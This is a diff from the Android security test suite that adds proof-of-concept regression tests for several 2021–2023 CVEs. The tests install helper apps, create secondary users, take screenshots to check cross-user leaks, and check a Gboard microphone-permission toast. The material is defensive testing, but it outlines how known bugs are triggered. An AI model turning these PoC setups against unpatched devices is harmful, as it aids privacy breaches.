diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21272.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21272.java
new file mode 100644
index 0000000..0c4f2a2
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21272.java
@@ -0,0 +1,59 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21272 extends NonRootSecurityTestCase {
+
+    // b/227471459
+    // Vulnerable module : framework.jar
+    @AsbSecurityTest(cveBugId = 227471459)
+    @Test
+    public void testPocCVE_2023_21272() {
+        try {
+            final String testPkg = "android.security.cts.CVE_2023_21272_test";
+
+            // Install the helper app
+            installPackage("CVE-2023-21272-helper.apk");
+
+            // Install the test app
+            installPackage("CVE-2023-21272-test.apk");
+
+            // Run the test "testCVE_2023_21272"
+            runDeviceTests(testPkg, testPkg + ".DeviceTest", "testCVE_2023_21272");
+        } catch (Exception e) {
+            assumeNoException(e);
+        } finally {
+            try {
+                // return to Home screen after test run
+                AdbUtils.runCommandLine("input keyevent KEYCODE_HOME", getDevice());
+            } catch (Exception ignored) {
+                // ignore all exceptions
+            }
+        }
+    }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21279.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21279.java
new file mode 100644
index 0000000..fed42d6
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21279.java
@@ -0,0 +1,89 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.UserUtils;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import com.android.tradefed.util.IRunUtil;
+import com.android.tradefed.util.RunUtil;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21279 extends NonRootSecurityTestCase {
+
+    @AsbSecurityTest(cveBugId = 277741109)
+    @Test
+    public void testPocCVE_2023_21279() {
+        try {
+            ITestDevice device = getDevice();
+            final String testPkg = "android.security.cts.CVE_2023_21279";
+
+            // Install test app in device
+            installPackage("CVE-2023-21279.apk", "-g");
+
+            // Create new user and save a screenshot in that user
+            final int currentUserId = device.getCurrentUser();
+            try (AutoCloseable asSecondaryUser =
+                    new UserUtils.SecondaryUser(device)
+                            .name("cve_2023_21279_user")
+                            .doSwitch()
+                            .withUser()) {
+                int userId = device.getCurrentUser();
+                device.executeShellCommand("input keyevent KEYCODE_SYSRQ");
+
+                // Wait for screenshot to get saved in the created user
+                final long timeout = 5_000L;
+                final long waitPerIteration = 500L;
+                boolean screenshotSaved = false;
+                IRunUtil runUtil = RunUtil.getDefault();
+                long start = System.currentTimeMillis();
+                do {
+                    screenshotSaved =
+                            device.executeShellCommand(
+                                            "content query --user "
+                                                    + userId
+                                                    + " --projection _id --uri"
+                                                    + " content://media/external/images/media/")
+                                    .contains("Row");
+                    if (screenshotSaved) {
+                        break;
+                    }
+                    runUtil.sleep(waitPerIteration);
+                } while (System.currentTimeMillis() - start <= timeout);
+                assumeTrue(
+                        "Screenshot was not saved in the created userId = " + userId,
+                        screenshotSaved);
+                // Switch back to original user
+                assumeTrue(device.switchUser(currentUserId));
+
+                // Run DeviceTest
+                runDeviceTests(testPkg, testPkg + ".DeviceTest", "testPocCVE_2023_21279");
+            }
+        } catch (Exception e) {
+            assumeNoException(e);
+        }
+    }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21285.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21285.java
new file mode 100644
index 0000000..d4ce9a4
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21285.java
@@ -0,0 +1,52 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.UserUtils;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21285 extends NonRootSecurityTestCase {
+
+    @AsbSecurityTest(cveBugId = 271851153)
+    @Test
+    public void testPocCVE_2023_21285() {
+        try {
+            final String testPkg = "android.security.cts.CVE_2023_21285";
+            installPackage("CVE-2023-21285.apk");
+
+            try (AutoCloseable asSecondaryUser =
+                    new UserUtils.SecondaryUser(getDevice())
+                            .name("cve_2023_21285_user")
+                            .withUser()) {
+
+                // Run DeviceTest
+                runDeviceTests(testPkg, testPkg + ".DeviceTest", "testPocCVE_2023_21285");
+            }
+        } catch (Exception e) {
+            assumeNoException(e);
+        }
+    }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21286.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21286.java
new file mode 100644
index 0000000..31494b2
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21286.java
@@ -0,0 +1,89 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.UserUtils;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import com.android.tradefed.util.IRunUtil;
+import com.android.tradefed.util.RunUtil;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21286 extends NonRootSecurityTestCase {
+
+    @AsbSecurityTest(cveBugId = 277740082)
+    @Test
+    public void testPocCVE_2023_21286() {
+        try {
+            ITestDevice device = getDevice();
+            final String testPkg = "android.security.cts.CVE_2023_21286";
+
+            // Install test app in device
+            installPackage("CVE-2023-21286.apk", "-g");
+
+            // Create new user and save a screenshot in that user
+            final int currentUserId = device.getCurrentUser();
+            try (AutoCloseable asSecondaryUser =
+                    new UserUtils.SecondaryUser(device)
+                            .name("cve_2023_21286_user")
+                            .doSwitch()
+                            .withUser()) {
+                int userId = device.getCurrentUser();
+                device.executeShellCommand("input keyevent KEYCODE_SYSRQ");
+
+                // Wait for screenshot to get saved in the created user
+                final long timeout = 5_000L;
+                final long waitPerIteration = 500L;
+                boolean screenshotSaved = false;
+                IRunUtil runUtil = RunUtil.getDefault();
+                long start = System.currentTimeMillis();
+                do {
+                    screenshotSaved =
+                            device.executeShellCommand(
+                                            "content query --user "
+                                                    + userId
+                                                    + " --projection _id --uri"
+                                                    + " content://media/external/images/media/")
+                                    .contains("Row");
+                    if (screenshotSaved) {
+                        break;
+                    }
+                    runUtil.sleep(waitPerIteration);
+                } while (System.currentTimeMillis() - start <= timeout);
+                assumeTrue(
+                        "Screenshot was not saved in the created userId = " + userId,
+                        screenshotSaved);
+                // Switch back to original user
+                assumeTrue(device.switchUser(currentUserId));
+
+                // Run DeviceTest
+                runDeviceTests(testPkg, testPkg + ".DeviceTest", "testPocCVE_2023_21286");
+            }
+        } catch (Exception e) {
+            assumeNoException(e);
+        }
+    }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21291.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21291.java
new file mode 100644
index 0000000..d197a92
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21291.java
@@ -0,0 +1,60 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.SystemUtil;
+import com.android.sts.common.UserUtils;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21291 extends NonRootSecurityTestCase {
+
+    @AsbSecurityTest(cveBugId = 277593270)
+    @Test
+    public void testPocCVE_2023_21291() {
+        try {
+            // Install application
+            installPackage("CVE-2023-21291.apk", "-g");
+
+            // Create a secondary user cve_2023_21291_user and enable global hidden_api_policy to
+            // access hidden field in DeviceTest
+            ITestDevice device = getDevice();
+            try (AutoCloseable closable =
+                            SystemUtil.withSetting(device, "global", "hidden_api_policy", "1");
+                    AutoCloseable asSecondaryUser =
+                            new UserUtils.SecondaryUser(device)
+                                    .name("cve_2023_21291_user")
+                                    .withUser()) {
+
+                // Run DeviceTest
+                final String testPkg = "android.security.cts.CVE_2023_21291";
+                runDeviceTests(testPkg, testPkg + ".DeviceTest", "testPocCVE_2023_21291");
+            }
+        } catch (Exception e) {
+            assumeNoException(e);
+        }
+    }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_35669.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_35669.java
new file mode 100644
index 0000000..06dffc4
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_35669.java
@@ -0,0 +1,48 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_35669 extends NonRootSecurityTestCase {
+
+    @AsbSecurityTest(cveBugId = 265798288)
+    @Test
+    public void testPocCVE_2023_35669() {
+        try {
+            // Install the test and target apps
+            installPackage("CVE-2023-35669-test.apk");
+            installPackage("CVE-2023-35669-target.apk");
+
+            final String testPkg = "android.security.cts.CVE_2023_35669_test";
+
+            // Run the test "testCVE_2023_35669"
+            runDeviceTests(testPkg, testPkg + ".DeviceTest", "testCVE_2023_35669");
+        } catch (Exception e) {
+            assumeNoException(e);
+        }
+    }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_40120.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_40120.java
new file mode 100644
index 0000000..a489cea
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_40120.java
@@ -0,0 +1,52 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_40120 extends NonRootSecurityTestCase {
+
+    @AsbSecurityTest(cveBugId = 274775190)
+    @Test
+    public void testPocCVE_2023_40120() {
+        try {
+            final String testPkg = "android.security.cts.CVE_2023_40120";
+            installPackage("CVE-2023-40120.apk");
+
+            // Run DeviceTest
+            runDeviceTests(testPkg, testPkg + ".DeviceTest", "testPocCVE_2023_40120");
+        } catch (Exception e) {
+            assumeNoException(e);
+        } finally {
+            try {
+                // To exit test gracefully
+                getDevice().executeShellV2Command("input keyevent KEYCODE_HOME");
+            } catch (Exception e) {
+                // ignore the exceptions
+            }
+        }
+    }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/TestLocationScanningServicesUsingSlices.java b/hostsidetests/securitybulletin/src/android/security/cts/TestLocationScanningServicesUsingSlices.java
new file mode 100644
index 0000000..da60be3
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/TestLocationScanningServicesUsingSlices.java
@@ -0,0 +1,95 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static com.android.sts.common.SystemUtil.withSetting;
+
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.After;
+import org.junit.Before;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class TestLocationScanningServicesUsingSlices extends NonRootSecurityTestCase {
+    private final String mTestPkg = "android.security.cts.TestLocationScanningServicesUsingSlices";
+    private final String mTestClass = mTestPkg + "." + "DeviceTest";
+    private ITestDevice mDevice = null;
+
+    @Before
+    public void setUp() {
+        try {
+            mDevice = getDevice();
+
+            // Install test app
+            installPackage("TestLocationScanningServicesUsingSlices.apk", "-t");
+
+            // Set test app as device owner
+            assumeTrue(
+                    mDevice.setDeviceOwner(
+                            mTestPkg + "/.PocDeviceAdminReceiver", mDevice.getCurrentUser()));
+        } catch (Exception e) {
+            assumeNoException(e);
+        }
+    }
+
+    @After
+    public void tearDown() {
+        try {
+            mDevice.removeAdmin(mTestPkg + "/.PocDeviceAdminReceiver", mDevice.getCurrentUser());
+            AdbUtils.runCommandLine("input keyevent KEYCODE_HOME", mDevice);
+        } catch (Exception ignored) {
+            // ignore all exceptions
+        }
+    }
+
+    // b/277333781
+    // Vulnerable module : com.android.settings
+    // Vulnerable apk : Settings.apk
+    @AsbSecurityTest(cveBugId = 277333781)
+    @Test
+    public void testPocCVE_2023_21247() {
+        try (AutoCloseable withBluetoothDisabled =
+                withSetting(mDevice, "global", "ble_scan_always_enabled", "0")) {
+            runDeviceTests(mTestPkg, mTestClass, "testPocCVE_2023_21247");
+        } catch (Exception e) {
+            assumeNoException(e);
+        }
+    }
+
+    // b/277333746
+    // Vulnerable module : com.android.settings
+    // Vulnerable apk : Settings.apk
+    @AsbSecurityTest(cveBugId = 277333746)
+    @Test
+    public void testPocCVE_2023_21248() {
+        try (AutoCloseable withWifiDisabled =
+                withSetting(mDevice, "global", "wifi_scan_always_enabled", "0")) {
+            runDeviceTests(mTestPkg, mTestClass, "testPocCVE_2023_21248");
+        } catch (Exception e) {
+            assumeNoException(e);
+        }
+    }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/BUG-261036568/content-provider/src/android/security/cts/BUG_261036568_provider/ImageProvider.java b/hostsidetests/securitybulletin/test-apps/BUG-261036568/content-provider/src/android/security/cts/BUG_261036568_provider/ImageProvider.java
index 28041b1..169822d 100644
--- a/hostsidetests/securitybulletin/test-apps/BUG-261036568/content-provider/src/android/security/cts/BUG_261036568_provider/ImageProvider.java
+++ b/hostsidetests/securitybulletin/test-apps/BUG-261036568/content-provider/src/android/security/cts/BUG_261036568_provider/ImageProvider.java
@@ -69,6 +69,17 @@
         }
     }
 
+    /**
+     * Computes an appId from uid
+     *
+     * @param uid The uid of the app
+     * @return The app id of the app
+     * @see android.os.UserHandle#getAppId
+     */
+    private static int getAppId(int uid) {
+        return uid % 100000;
+    }
+
     @Override
     public boolean onCreate() {
         mChooserUid = getChooserUid(getContext());
@@ -145,7 +156,7 @@
         UserHandle caller = getCallingUserHandle();
         if (!myUserHandle().equals(caller)) {
             int callingUid = getCallingUid();
-            if (callingUid != mChooserUid) {
+            if (getAppId(callingUid) != getAppId(mChooserUid)) {
                 Log.w(TAG, "Ignoring cross-user access by package " + getCallingPackage()
                         + " (uid=" + callingUid + ")");
                 return;
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0595/test-app/res/values/strings.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0595/test-app/res/values/strings.xml
index faf549e..b0493f1 100644
--- a/hostsidetests/securitybulletin/test-apps/CVE-2021-0595/test-app/res/values/strings.xml
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0595/test-app/res/values/strings.xml
@@ -16,6 +16,7 @@
   -->
 
 <resources>
+    <string name="deviceLockFailMessage">Device is not Locked!</string>
     <string name="helperAppPackage">android.security.cts.CVE_2021_0595_helper</string>
     <string name="launchSecondPocActivityAction">launchSecondPocActivity</string>
     <string name="testFailMessage">Vulnerable to b/177457096</string>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0595/test-app/src/android/security/cts/CVE_2021_0595_test/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0595/test-app/src/android/security/cts/CVE_2021_0595_test/DeviceTest.java
index 431d445..b3784f5 100644
--- a/hostsidetests/securitybulletin/test-apps/CVE-2021-0595/test-app/src/android/security/cts/CVE_2021_0595_test/DeviceTest.java
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0595/test-app/src/android/security/cts/CVE_2021_0595_test/DeviceTest.java
@@ -19,10 +19,11 @@
 import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
 
 import static org.junit.Assert.assertFalse;
-import static org.junit.Assume.assumeTrue;
 import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
 
 import android.app.Instrumentation;
+import android.app.KeyguardManager;
 import android.app.admin.DevicePolicyManager;
 import android.content.ComponentName;
 import android.content.Context;
@@ -72,6 +73,9 @@
 
             // Swipe/Remove Lock Screen
             device.pressMenu();
+            assumeTrue(
+                    context.getString(R.string.deviceLockFailMessage),
+                    context.getSystemService(KeyguardManager.class).isDeviceLocked());
             assertFalse(
                     context.getString(R.string.testFailMessage),
                     context.getString(R.string.helperAppPackage)
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-39622/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2021-39622/Android.bp
new file mode 100644
index 0000000..1a8fd19
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-39622/Android.bp
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package {
+    default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+    name: "CVE-2021-39622",
+    defaults: [
+        "cts_support_defaults",
+    ],
+    srcs: [
+        "src/**/*.java",
+    ],
+    test_suites: [
+        "sts",
+    ],
+    static_libs: [
+        "androidx.test.core",
+        "androidx.test.rules",
+        "androidx.test.uiautomator_uiautomator",
+    ],
+    sdk_version: "current",
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-39622/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-39622/AndroidManifest.xml
new file mode 100644
index 0000000..5ee0e4b
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-39622/AndroidManifest.xml
@@ -0,0 +1,36 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+  Copyright 2023 The Android Open Source Project
+
+  Licensed under the Apache License, Version 2.0 (the "License");
+  you may not use this file except in compliance with the License.
+  You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+  Unless required by applicable law or agreed to in writing, software
+  distributed under the License is distributed on an "AS IS" BASIS,
+  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+  See the License for the specific language governing permissions and
+  limitations under the License.
+-->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+    package="android.security.cts.CVE_2021_39622">
+    <application>
+        <service
+            android:name=".PocService"
+            android:exported="true"
+            android:permission="android.permission.BIND_VPN_SERVICE">
+            <intent-filter>
+                <action android:name="android.net.VpnService" />
+            </intent-filter>
+        </service>
+        <activity android:name=".PocActivity"
+            android:windowSoftInputMode="stateVisible"
+            android:exported="true" />
+    </application>
+    <instrumentation
+        android:name="androidx.test.runner.AndroidJUnitRunner"
+        android:targetPackage="android.security.cts.CVE_2021_39622" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-39622/res/values/strings.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-39622/res/values/strings.xml
new file mode 100644
index 0000000..103a118
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-39622/res/values/strings.xml
@@ -0,0 +1,28 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+  Copyright 2023 The Android Open Source Project
+
+  Licensed under the Apache License, Version 2.0 (the "License");
+  you may not use this file except in compliance with the License.
+  You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+  Unless required by applicable law or agreed to in writing, software
+  distributed under the License is distributed on an "AS IS" BASIS,
+  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+  See the License for the specific language governing permissions and
+  limitations under the License.
+-->
+
+<resources>
+    <string name="gboardPkgName">com.google.android.inputmethod.latin</string>
+    <string name="ipv4Address">192.0.0.0</string>
+    <string name="micIconResId">key_pos_header_voice</string>
+    <string name="okButtonText">ok</string>
+    <string name="port">0.0.0.0</string>
+    <string name="runnable">CVE_2021_39622_vpnServiceRunnable</string>
+    <string name="vpnSessionName">CVE_2021_39622_vpnService</string>
+    <string name="vulnerableViewText">.*Gboard needs microphone access to enable voice typing.*
+    </string>
+</resources>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-39622/src/android/security/cts/CVE_2021_39622/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-39622/src/android/security/cts/CVE_2021_39622/DeviceTest.java
new file mode 100644
index 0000000..4ffc6d4
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-39622/src/android/security/cts/CVE_2021_39622/DeviceTest.java
@@ -0,0 +1,106 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2021_39622;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+
+import android.app.Instrumentation;
+import android.content.Context;
+import android.content.Intent;
+
+import androidx.test.platform.app.InstrumentationRegistry;
+import androidx.test.runner.AndroidJUnit4;
+import androidx.test.uiautomator.By;
+import androidx.test.uiautomator.BySelector;
+import androidx.test.uiautomator.UiDevice;
+import androidx.test.uiautomator.Until;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.regex.Pattern;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+    private static final int TIMEOUT_MS = 5000;
+    private UiDevice mUiDevice;
+
+    public void checkVulnerability(BySelector micIcon, BySelector vulText) {
+        try {
+            // Click microphone icon to expose the vulnerable toast
+            mUiDevice.wait(Until.hasObject(micIcon), TIMEOUT_MS);
+            mUiDevice.findObject(micIcon).click();
+        } catch (Exception e) {
+            // Ignore unintended exceptions here
+        }
+
+        assertFalse(mUiDevice.wait(Until.hasObject(vulText), TIMEOUT_MS));
+    }
+
+    @Test
+    public void testPocCVE_2021_39622() {
+        try {
+            Instrumentation instrumentation = InstrumentationRegistry.getInstrumentation();
+            mUiDevice = UiDevice.getInstance(instrumentation);
+            Context context = instrumentation.getTargetContext();
+
+            // Show Gboard and prepare VpnService
+            context.startActivity(
+                    new Intent(context, PocActivity.class).setFlags(Intent.FLAG_ACTIVITY_NEW_TASK));
+
+            // OK button is used to allow vpn connection request
+            BySelector okButton =
+                    By.text(
+                            Pattern.compile(
+                                    context.getString(R.string.okButtonText),
+                                    Pattern.CASE_INSENSITIVE));
+
+            BySelector micIcon =
+                    By.res(
+                            context.getString(R.string.gboardPkgName),
+                            context.getString(R.string.micIconResId));
+
+            BySelector vulText =
+                    By.text(
+                            Pattern.compile(
+                                    context.getString(R.string.vulnerableViewText),
+                                    Pattern.CASE_INSENSITIVE));
+
+            mUiDevice.wait(Until.hasObject(okButton), TIMEOUT_MS);
+            mUiDevice.findObject(okButton).click();
+
+            // In case permission was already denied using permission dialog box earlier, the
+            // permission dialog box does not appear and the mic icon of gboard appears
+            // unhighlighted indicating that mic permission is denied. Upon clicking the
+            // unhighlighted mic icon, vulnerable toast is visible.
+            checkVulnerability(micIcon, vulText);
+
+            // In case permission was not denied using permission dialog box earlier, the permission
+            // dialog box appears and pressing back turns the mic icon unhighlighted.
+            mUiDevice.pressBack();
+
+            // Check vulnerability after the mic icon is unhighlighted
+            checkVulnerability(micIcon, vulText);
+
+            // With fix the allow mic permission dialog box remains on screen
+            mUiDevice.pressHome();
+        } catch (Exception e) {
+            assumeNoException(e);
+        }
+    }
+}
